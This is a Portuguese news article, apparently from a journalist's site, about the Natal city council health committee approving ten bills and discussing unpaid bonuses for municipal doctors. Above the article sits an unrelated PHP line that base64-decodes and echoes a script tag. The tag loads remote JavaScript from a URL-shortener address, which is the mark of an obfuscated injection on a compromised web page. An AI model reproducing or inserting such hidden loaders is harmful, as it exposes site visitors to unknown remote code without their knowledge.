$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Comissão de Saúde aprova projetos e zera pauta no retorno do semestre

Comissão de Saúde aprova projetos e zera pauta no retorno do semestre
05 Ago 2019

A Comissão de Saúde da Câmara Municipal retornou aos trabalhos nesta segunda-feira (05) e teve como prioridade a aprovação de projetos importantes para a população. No total, foram aprovados dez projetos e outros quatro foram designados para relatoria dos vereadores. De acordo com o Presidente da Comissão, vereador Fernando Lucena (PT), a comissão cumpre com seu papel em defesa da saúde dos natalenses.

“Zeramos a pauta, foram dez projetos aprovados e outros quatro designados. Isso mostra o quanto a Comissão de Saúde é uma comissão que não só tem atuação externamente, como também internamente. Ficamos livres para na próxima segunda-feira realizarmos as visitas, já que não temos projetos para votação, mas a Comissão de Saúde está em dia com a população de Natal. Isso mostra também que a Câmara de Natal é atuante e está voltada para os interesses da população, da defesa da saúde da nossa população”, afirmou Fernando Lucena.

Outro ponto apresentado na pauta do encontro foi o pagamento das gratificações dos médicos do município. Segundo o vereador Cícero Martins (PSL), alguns dos profissionais aprovados no último concurso estão sem receber a gratificação salarial. A Comissão deverá convocar a Secretaria de Saúde para prestar esclarecimentos.

“O que ocorre é que estão pagando os salários, mas não estão inserindo as gratificações, então acontece em muitos casos dentro de um ambiente tem um profissional exercendo o mesmo trabalho do outro, só que um recebe a gratificação e o outro não. É por isso que nós temos uma demanda enorme de médicos que passaram no último concurso e que não assumiram. Levantamos esse tema aqui para que a gente chegue a um consenso com as secretarias de Saúde e de Administração e se necessário convocarmos o Secretário de Saúde”, destacou Cícero Martins.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *